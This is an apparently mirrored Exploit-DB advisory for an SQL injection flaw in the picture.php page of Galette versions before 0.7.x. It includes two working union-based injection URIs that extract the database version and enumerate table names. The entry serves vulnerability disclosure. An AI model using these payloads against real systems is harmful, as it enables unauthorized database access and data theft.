Lucene search

K
exploitdbSbzEDB-ID:18875
HistoryMay 13, 2012 - 12:00 a.m.

Galette - 'picture.php' SQL Injection

2012-05-1300:00:00
sbz
www.exploit-db.com
15

AI Score

7.4

Confidence

Low

EPSS

0.001

Percentile

38.0%

source: https://www.securityfocus.com/bid/53463/info

Galette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

Versions prior to Galette 0.7.x are vulnerable.

Attackers can use a browser to exploit this issue. 

The following example URIs are available. 

http://server/picture.php?id_adh=0+and+1=0+union+select+@@version,null 

http://server/picture.php?id_adh=0+and+1=0+union+select+group_concat(table_name,char(10)),null+from+information_schema.tables

AI Score

7.4

Confidence

Low

EPSS

0.001

Percentile

38.0%

Related for EDB-ID:18875